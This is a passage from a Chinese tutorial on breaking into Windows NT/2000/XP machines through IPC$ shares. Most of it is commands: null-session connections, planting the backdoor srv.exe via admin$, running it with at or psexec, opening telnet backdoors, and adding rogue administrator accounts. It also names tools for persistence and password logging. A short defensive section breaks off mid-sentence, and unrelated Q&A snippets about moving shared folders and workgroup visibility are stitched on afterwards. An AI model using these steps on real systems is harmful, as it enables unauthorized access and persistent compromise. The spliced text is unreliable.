ipc 管道本來是微軟為了方便管理員進行遠程管理而設計的，但在入侵者看來，開放 ipc 管道的主機似乎更容易得手。通過 ipc 管道，我們可以遠程調用一些系統函數（大多通過工具實現，但需要相應的許可權），這往往是入侵成敗的關鍵。如果不考慮這些，僅從傳送文件這一方面， ipc 管道已經給了入侵者莫大的支持，甚至已經成為了最重要的傳輸手段，因此你總能在各大論壇上看到一些朋友因為打不開目標機器的 ipc 管道而一籌莫展大呼救命。當然，我們也不能忽視許可權在 ipc 管道中扮演的重要角色，想必你一定品嘗過空會話的尷尬，沒有許可權，開啟管道我們也無可奈何。但入侵者一旦獲得了管理員的許可權，那麼 ipc 管道這把雙刃劍將顯示出它猙獰的一面。
七 ipc$ 連接失敗的常見原因
以下是一些常見的導致 ipc$ 連接失敗的原因：
1 IPC 連接是 Windows NT 及以上系統中特有的功能，由於其需要用到 Windows NT 中很多 DLL 函數，所以不能在 Windows 9.x/Me 系統中運行，也就是說只有 nt/2000/xp 才可以相互建立 ipc$ 連接， 98/me 是不能建立 ipc$ 連接的；
2 如果想成功的建立一個 ipc$ 連接，就需要響應方開啟 ipc$ 共享，即使是空連接也是這樣，如果響應方關閉了 ipc$ 共享，將不能建立連接；
3 連接發起方未啟動 Lanmanworkstation 服務（顯示名為： Workstation ）：它提供網路鏈結和通訊，沒有它發起方無法發起連接請求；
4 響應方未啟動 Lanmanserver 服務（顯示名為： Server ）：它提供了 RPC 支持、文件、列印以及命名管道共享， ipc$ 依賴於此服務，沒有它主機將無法響應發起方的連接請求，不過沒有它仍可發起 ipc$ 連接；
5 響應方未啟動 NetLogon ，它支持網路上計算機 pass-through 帳戶登錄身份（不過這種情況好像不多）；
6 響應方的 139 ， 445 埠未處於監聽狀態或被防火牆屏蔽；
7 連接發起方未打開 139 ， 445 埠；
8 用戶名或者密碼錯誤：如果發生這樣的錯誤，系統將給你類似於 ' 無法更新密碼 ' 這樣的錯誤提示（顯然空會話排除這種錯誤）；
9 命令輸入錯誤：可能多了或少了空格，當用戶名和密碼中不包含空格時兩邊的雙引號可以省略，如果密碼為空，可以直接輸入兩個引號 "" 即可；
10 如果在已經建立好連接的情況下對方重啟計算機，那麼 ipc$ 連接將會自動斷開，需要重新建立連接。
另外 , 你也可以根據返回的錯誤號分析原因：
錯誤號 5 ，拒絕訪問：很可能你使用的用戶不是管理員許可權的；
錯誤號 51 ， Windows 無法找到網路路徑：網路有問題；
錯誤號 53 ，找不到網路路徑： ip 地址錯誤；目標未開機；目標 lanmanserver 服務未啟動；目標有防火牆（埠過濾）；
錯誤號 67 ，找不到網路名：你的 lanmanworkstation 服務未啟動或者目標刪除了 ipc$ ；
錯誤號 1219 ，提供的憑據與已存在的憑據集沖突：你已經和對方建立了一個 ipc$ ，請刪除再連；
錯誤號 1326 ，未知的用戶名或錯誤密碼：原因很明顯了；
錯誤號 1792 ，試圖登錄，但是網路登錄服務沒有啟動：目標 NetLogon 服務未啟動；
錯誤號 2242 ，此用戶的密碼已經過期：目標有帳號策略，強制定期要求更改密碼。
八 復制文件失敗的原因
有些朋友雖然成功的建立了 ipc$ 連接，但在 時卻遇到了這樣那樣的麻煩，無法復製成功，那麼導致復制失敗的常見原因又有哪些呢？
1 對方未開啟共享文件夾
這類錯誤出現的最多，佔到 50% 以上。許多朋友在 ipc$ 連接建立成功後，甚至都不知道對方是否有共享文件夾，就進行盲目復制，結果導致復制失敗而且郁悶的很。因此我建議大家在進行復制之前務必用 net view \\IP 這個命令看一下你想要復制的共享文件夾是否存在（用軟體查看當然更好），不要認為能建立 ipc$ 連接就一定有共享文件夾存在。
2 向默認共享復制失敗
這類錯誤也是大家經常犯的，主要有兩個小方面：
1 ）錯誤的認為能建立 ipc$ 連接的主機就一定開啟了默認共享，因而在建立完連接之後馬上向 c$,d$,admin$ 之類的默認共享復制文件，一旦對方未開啟默認共享，將導致復制失敗。 ipc$ 連接成功只能說明對方打開了 ipc$ 共享，並不能說明默認共享一定存在。 ipc$ 共享與默認共享是 兩碼 事， ipc$ 共享是一個命名管道，並不是哪個實際的文件夾，而默認共享卻是實實在在的共享文件夾；
2 ）由於 net view \\IP 這個命令無法顯示默認共享文件夾（因為默認共享帶 $ ），因此通過這個命令，我們並不能判斷對方是否開啟了默認共享，因此如果對方未開啟默認共享，那麼所有向默認共享進行的操作都不能成功；（不過大部分掃描軟體在掃弱口令的同時，都能掃到默認共享目錄，可以避免此類錯誤的發生）
要點：請大家一定區分 ipc 共享，默認共享，普通共享這三者的區別： ipc 共享是一個管道，並不是實際的共享文件夾；默認共享是安裝時默認打開的文件夾；普通共享是我們自己開啟的可以設置許可權的共享文件夾。
3 用戶許可權不夠，包括四種情形：
1 ）空連接向所有共享（默認共享和普通共享）復制時，許可權是不夠的；
2 ）向默認共享復制時，在 Win2000 Pro 版中，只有 Administrators 和 Backup Operators 組成員才可以，在 Win2000 Server 版本 Server Operatros 組也可以訪問到這些共享目錄；
3 ）向普通共享復制時，要具有相應許可權（即對方管理員事先設定的訪問許可權）；
4 ）對方可以通過防火牆或安全軟體的設置，禁止外部訪問共享；
注意：
1 不要認為 administrator 就一定具有管理員許可權，管理員名稱是可以改的
2 管理員可以訪問默認共享的文件夾，但不一定能夠訪問普通的共享文件夾，因為管理員可以對普通的共享文件夾進行訪問許可權設置，如圖 6 ，管理員為 D 盤設置的訪問許可權為僅允許名為 xinxin 的用戶對該文件夾進行完全訪問，那麼此時即使你擁有管理員許可權，你仍然不能訪問 D 盤。不過有意思的是，如果此時對方又開啟了 D$ 的默認共享，那麼你卻可以訪問 D$ ，從而繞過了許可權限制，有興趣的朋友可以自己做測試。
4 被防火牆殺死或在區域網
還有一種情況，那就是也許你的復制操作已經成功，但當遠程運行時，被防火牆殺掉了，導致找不到文件；或者你把木馬復制到了區域網內的主機，導致連接失敗（反向連接的木馬不會發生這種情況）。如果你沒有想到這種情況，你會以為是復制上出了問題，但實際你的復制操作已經成功了，只是運行時出了問題。
呵呵，大家也知道， ipc$ 連接在實際操作過程中會出現各種各樣的問題，上面我所總結的只是一些常見錯誤，沒說到的，大家可以給我提個醒兒。
九 關於 at 命令和 xp 對 ipc$ 的限制
本來還想說一下用 at 遠程運行程序失敗的原因，但考慮到 at 的成功率不是很高，問題也很多，在這里就不提它了（提的越多，用的人就越多），而是推薦大家用 psexec.exe 遠程運行程序，假設想要遠程機器執行本地 c:\xinxin.exe 文件，且管理員為 administrator ，密碼為 1234 ，那麼輸入下面的命令：
psexec \\ip -u administrator -p 1234 -c c:\xinxin.exe
如果已經建立 ipc 連接，則 -u -p 這兩個參數不需要， psexec.exe 將自動拷貝文件到遠程機器並運行。
本來 xp 中的 ipc$ 也不想在這里討論，想單獨拿出來討論，但看到越來越多的朋友很急切的提問為什麼遇到 xp 的時候，大部分操作都很難成功。我在這里就簡單提一下吧，在 xp 的默認安全選項中，任何遠程訪問僅被賦予來賓許可權，也就是說即使你是用管理員帳戶和密碼，你所得到的許可權也只是 Guest ，因此大部分操作都會因為許可權不夠而失敗，而且到目前為止並沒有一個好的辦法來突破這一限制。所以如果你真的得到了 xp 的管理員密碼，我建議你盡量避開 ipc 管道。
十 如何打開目標的 IPC$ 共享以及其他共享
目標的 ipc$ 不是輕易就能打開的，否則就要天下打亂了。你需要一個 admin 許可權的 shell ，比如 telnet ，木馬， cmd 重定向等，然後在 shell 下執行：
net share ipc$
開放目標的 ipc$ 共享；
net share ipc$ /del
關閉目標的 ipc$ 共享；如果你要給它開共享文件夾，你可以用：
net share xinxin=c:\
這樣就把它的 c 盤開為共享名為 xinxin 共享文件夾了。（可是我發現很多人錯誤的認為開共享文件夾的命令是 net share c$ ，還大模大樣的給菜鳥指指點點，真是誤人子弟了）。再次聲明，這些操作都是在 shell 下才能實現的。
十一 一些需要 shell 才能完成的命令
看到很多教程這方面寫的十分不準確，一些需要 shell 才能完成命令就簡簡單單的在 ipc$ 連接下執行了，起了誤導作用。那麼下面我總結一下需要在 shell 才能完成的命令：
1 向遠程主機建立用戶，激活用戶，修改用戶密碼，加入管理組的操作需要在 shell 下完成；
2 打開遠程主機的 ipc$ 共享，默認共享，普通共享的操作需要在 shell 下完成；
3 運行 / 關閉遠程主機的服務，需要在 shell 下完成；
4 啟動 / 殺掉遠程主機的進程，也需要在 shell 下完成（用軟體的情況下除外，如 pskill ）。
十二 入侵中可能會用到的命令
為了這份教程的完整性，我列出了 ipc$ 入侵中的一些常用命令，如果你已經掌握了這些命令，你可以跳過這一部分看下面的內容。請注意這些命令是適用於本地還是遠程，如果只適用於本地，你只能在獲得遠程主機的 shell （如 cmd ， telnet 等）後，才能向遠程主機執行。
1 建立 / 刪除 ipc$ 連接的命令
1 ）建立空連接 :
net use \\127.0.0.1\ipc$ "" /user:""
2 ）建立非空連接 :
net use \\127.0.0.1\ipc$ " 密碼 " /user:" 用戶名 "
3 ）刪除連接 :
net use \\127.0.0.1\ipc$ /del
2 在 ipc$ 連接中對遠程主機的操作命令
1 ） 查看遠程主機的共享資源（看不到默認共享） :
net view \\127.0.0.1
2 ） 查看遠程主機的當前時間 :
net time \\127.0.0.1
3 ） 得到遠程主機的 netbios 用戶名列表 :
nbtstat -A 127.0.0.1
4 ）映射 / 刪除遠程共享 :
net use z: \\127.0.0.1\c
此命令將共享名為 c 的共享資源映射為本地 z 盤
net use z: /del
刪除映射的 z 盤，其他盤類推
5 ）向遠程主機復制文件 :
路徑 \ 文件名 \\IP\ 共享目錄名，如：
c:\xinxin.exe \\127.0.0.1\c$ 即將 c 盤下的 xinxin.exe 復制到對方 c 盤內
當然，你也可以把遠程主機上的文件復制到自己的機器里：
\\127.0.0.1\c$\xinxin.exe c:\
6 ）遠程添加計劃任務 :
at \\IP 時間 程序名 如：
at \\127.0.0.0 11:00 xinxin.exe
注意：時間盡量使用 24 小時制；如果你打算運行的程序在系統默認搜索路徑（比如 system32/ ）下則不用加路徑，否則必須加全路徑
3 本地命令
1 ）查看本地主機的共享資源（可以看到本地的默認共享）
net share
2 ）得到本地主機的用戶列表
net user
3 ）顯示本地某用戶的帳戶信息
net user 帳戶名
4 ）顯示本地主機當前啟動的服務
net start
5 ）啟動 / 關閉本地服務
net start 服務名
net stop 服務名
6 ）在本地添加帳戶
net user 帳戶名 密碼 /add
7 ）激活禁用的用戶
net uesr 帳戶名 /active:yes
8 ）加入管理員組
net localgroup administrators 帳戶名 /add
很顯然的是，雖然這些都是本地命令，但如果你在遠程主機的 shell 中輸入，比如你 telnet 成功後輸入上面這些命令，那麼這些本地輸入將作用在遠程主機上。
4 其他一些命令
1 ） telnet
telnet IP 埠
telnet 127.0.0.0 23
2 ）用 opentelnet.exe 開啟遠程主機的 telnet
OpenTelnet.exe \\ip 管理員帳號 密碼 NTLM 的認證方式 port
OpenTelnet.exe \\127.0.0.1 administrator "" 1 90
不過這個小工具需要滿足四個要求：
1 ）目標開啟了 ipc$ 共享
2 ）你要擁有管理員密碼和帳號
3 ）目標開啟 RemoteRegistry 服務，用戶就可以更改 ntlm 認證
4 ）對僅 WIN2K/XP 有效
3 ）用 psexec.exe 一步獲得 shell ，需要 ipc 管道支持
psexec.exe \\IP -u 管理員帳號 -p 密碼 cmd
psexec.exe \\127.0.0.1 -u administrator -p "" cmd
十三 對比過去和現今的 ipc$ 入侵
既然是對比，那麼我就先把過去的 ipc$ 入侵步驟寫給大家，都是蠻經典的步驟：
[1]
C:\>net use \\127.0.0.1\ipc$ "" /user:admintitrators
\\ 用掃到的空口令建立連接
[2]
c:\>net view \\127.0.0.1
\\ 查看遠程的共享資源
[3]
C:\> srv.exe \\127.0.0.1\admin$\system32
\\ 將一次性後門 srv.exe 復制到對方的系統文件夾下，前提是 admin$ 開啟
[4]
C:\>net time \\127.0.0.1
\\ 查看遠程主機的當前時間
[5]
C:\>at \\127.0.0.1 時間 srv.exe
\\ 用 at 命令遠程運行 srv.exe ，需要對方開啟了 'Task Scheler' 服務
[6]
C:\>net time \\127.0.0.1
\\ 再次查看當前時間來估算 srv.exe 是否已經運行，此步可以省略
[7]
C:\>telnet 127.0.0.1 99
\\ 開一個新窗口，用 telnet 遠程登陸到 127.0.0.1 從而獲得一個 shell( 不懂 shell 是什麼意思？那你就把它想像成遠程機器的控制權就好了，操作像 DOS) ， 99 埠是 srv.exe 開的一次性後門的埠
[8]
C:\WINNT\system32>net start telnet
\\ 我們在剛剛登陸上的 shell 中啟動遠程機器的 telnet 服務，畢竟 srv.exe 是一次性的後門，我們需要一個長久的後門便於以後訪問，如果對方的 telnet 已經啟動，此步可省略
[9]
C:\> ntlm.exe \\127.0.0.1\admin$\system32
\\ 在原來那個窗口中將 ntlm.exe 傳過去， ntlm.exe 是用來更改 telnet 身份驗證的
[10]
C:\WINNT\system32>ntlm.exe
\\ 在 shell 窗口中運行 ntlm.exe ，以後你就可以暢通無阻的 telnet 這台主機了
[11]
C:\>telnet 127.0.0.1 23
\\ 在新窗口中 telnet 到 127.0.0.1 ，埠 23 可省略，這樣我們又獲得一個長期的後門
[12]
C:\WINNT\system32>net user 帳戶名 密碼 /add
C:\WINNT\system32>net uesr guest /active:yes
C:\WINNT\system32>net localgroup administrators 帳戶名 /add
\\telnet 上以後，你可以建立新帳戶，激活 guest ，把任何帳戶加入管理員組等
好了，寫到這里我似乎回到了 2 ， 3 年前，那時的 ipc$ 大家都是這么用的，不過隨著新工具的出現，上面提到的一些工具和命令現在已經不常用到了，那就讓我們看看現在的高效而簡單的 ipc$ 入侵吧。
[1]
psexec.exe \\IP -u 管理員帳號 -p 密碼 cmd
\\ 用這個工具我們可以一步到位的獲得 shell
OpenTelnet.exe \\server 管理員帳號 密碼 NTLM 的認證方式 port
\\ 用它可以方便的更改 telnet 的驗證方式和埠，方便我們登陸
[2]
已經沒有第二步了，用一步獲得 shell 之後，你做什麼都可以了，安後門可以用 winshell ，克隆就用 ca 吧，開終端用 3389.vbe ，記錄密碼用 win2kpass ，總之好的工具不少，隨你選了，我就不多說了。
十四 如何防範 ipc$ 入侵
1 禁止空連接進行枚舉 ( 此操作並不能阻止空連接的建立 )
運行 regedit ，找到如下主鍵 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA] 把 RestrictAnonymous = DWORD 的鍵值改為： 1
如果設置為 "1" ，一個匿名用戶仍然可以連接到 IPC$ 共享，但無法通過這種連接得到列舉 SAM 帳號和共享信息的許可權；在 Windows 2000 中增加了 "2" ，未取得匿名權的用戶將不能進行 ipc$ 空連接。建議設置為 1 。如果上面所說的主鍵不存在，就新建一個再改鍵值。如果你覺得改注冊表麻煩，可以在本地安全設置中設置此項： 在本地安全設置－本地策略－安全選項－ ' 對匿名連接的額外限制 '
2 禁止默認共享
1 ）察看本地共享資源
運行 -cmd- 輸入 net share
2 ）刪除共享（重起後默認共享仍然存在）
net share ipc$ /delete
net share admin$ /delete
net share c$ /delete
net share d$ /delete （如果有 e,f, ……可以繼續刪除）
3 ）停止 server 服務
net stop server /y （重新啟動後 server 服務會重新開啟）
4 ）禁止自動打開默認共享（此操作並不能關閉 ipc$ 共享）
運行 -regedit
server 版 : 找到如下主鍵 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters] 把 AutoShareServer （ DWORD ）的鍵值改為 :00000000 。
pro 版 : 找到如下主鍵 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters] 把 AutoShareWks （ DWORD ）的鍵值改為 :00000000 。
這兩個鍵值在默認情況下在主機上是不存在的，需要自己手動添加，修改後重起機器使設置生效。
3 關閉 ipc$ 和默認共享依賴的服務 :server 服務
如果你真的想關閉 ipc$ 共享，那就禁止 server 服務吧：
控制面板 - 管理工具 - 服務 - 找到 server 服務（右擊） - 屬性 - 常規 - 啟動類型 - 選已禁用，這時可能會有提示說： XXX 服務也會關閉是否繼續，因為還有些次要的服務要依賴於 server 服務，不要管它。
4 屏蔽 139 ， 445 埠
由於沒有以上兩個埠的支持，是無法建立 ipc$ 的，因此屏蔽 139 ， 445 埠同樣可以阻止 ipc$ 入侵。
1 ） 139 埠可以通過禁止 NBT 來屏蔽
本地連接－ TCP/IT 屬性－高級－ WINS －選『禁用

6. 懸賞20分，如何將C盤里的「共享文檔」遷移到別的盤裡面去

首先，在你想要更改到的目錄下新建一個文件夾，另外，鑒於共享文件的開放性，你最好不要將其放在一個私人文件夾內。接下來的步驟便是我們很熟悉的編輯注冊表。到HKLM\SOFTWARE\Microsoft\Windows\
CurrentVersion\Explorer\Shell Folders目錄下，雙擊名為Common Documents的子鍵，將其鍵值更改為剛才新建文件夾的路徑。然後對CommonMusic，CommonPictures和CommonVideo進行同樣的操作（注意，這三項子鍵的名稱中間沒有空格）。

下面來到HKLM\SOFTWARE\Microsoft\Windows\
CurrentVersion\Explorer\User Shell Folders目錄，對Common Documents子鍵進行同樣的操作，並新建三個分別名為CommonMusic，CommonPictures和CommonVideo的子鍵，並將其鍵值更改為新文件夾的路徑，注意輸入路徑的正確性。

大功告成，向新建的共享文件夾中拷貝一個測試文件，注銷並以另一個用戶登錄，現在你便能發現一個可用的新共享文件夾了。注銷並登錄回到原帳戶，這時「我的電腦」窗口最上方的共享文件夾中便有你新建的那一個。如果希望在網路中共享文件，別忘了對文件夾啟用網路共享。

找來的 不知道怎麼樣 你試試吧

7. 怎麼把一台電腦的文件快速的拷貝到另外一台電腦上

1、將新、舊兩台電腦都連接到同一個路由器下。有線和無線都可以。條件允許的話推薦插網線。網路傳輸相對比無線網路穩定。

8. 區域網工作組電腦顯示不全

1、控制面板---"網路和共享中心"--這時可以看到「計算機--網路--interner」。
2、然後點擊「網路」，如果已設置了啟用網路共享發現，便會自動搜索，看到同一區域網的其他計算機。
3、如果未啟用網路共享，在網路和共享中心的「更改高級共享設置」打開即可。



win7系統查不到工作組電腦操作步驟：
1、首先打開win7系統中的運行對話框，然後輸入gpedit.msc，回車打開組策略；

2、依次展開計算機配置——Windows設置——安全設置——本地策略，點擊安全選項找到網路安全：LAN 管理器身份驗證級別；
3、雙擊將驗證級別改為發送LM和NTLM 響應（&），確定打開控制面板——網路和共享中心，查看目前使用的網路設置的是工作網路還是公用網路如果是公用網路，點擊公用網路，更改為工作網路，電腦再重新啟動下就可以了。

9. 怎麼修改共享文檔的存放路徑

桌面——我的文檔——在這個上面按滑鼠右鍵——屬性——自己改動路徑一將C:\Documents and Settings\我的用戶名目錄下的文件夾My Documents復制到D盤二右擊桌面我的文檔→屬性→目標文件夾的路徑改成D:\My Documents三這時我的文檔已經指向D盤，可能我的文檔中圖片收藏和我的音樂下面的文件夾會有復件，刪除霏凡論壇再次出精品實用綠軟┊個人設置和資料轉移器2.0┊19日更新！需要的請來下載最新個人設置和資料轉移器2.0(霏凡專版)[19日更新,加入還原功能]本程序為綠色軟體，功能和作用是方便快捷的轉移一些個人資料和設置，將其轉移動其它目錄，避免這些東東存放在系統分區，減少對系統分區的佔用，還有不讓重裝系統後個人資料的丟失！程序中已經有詳細說明…… （滑鼠指向選項就會彈出對應的項目說明）本版增加了將選項還原至系統默認設置的選項。並且已經修正了上一版本中存在的所有BUG，今天花了一整天時間對程序源代碼進行了修改，重寫並精簡了一下代碼，個人認為程序已經基本完善了。不管你之前有沒有使用過其它轉移工具或手動設置轉移過，軟體都能正確進行轉移和還原設置操作……，沒什麼可多說的了，喜歡的就頂吧！發現問題就說吧！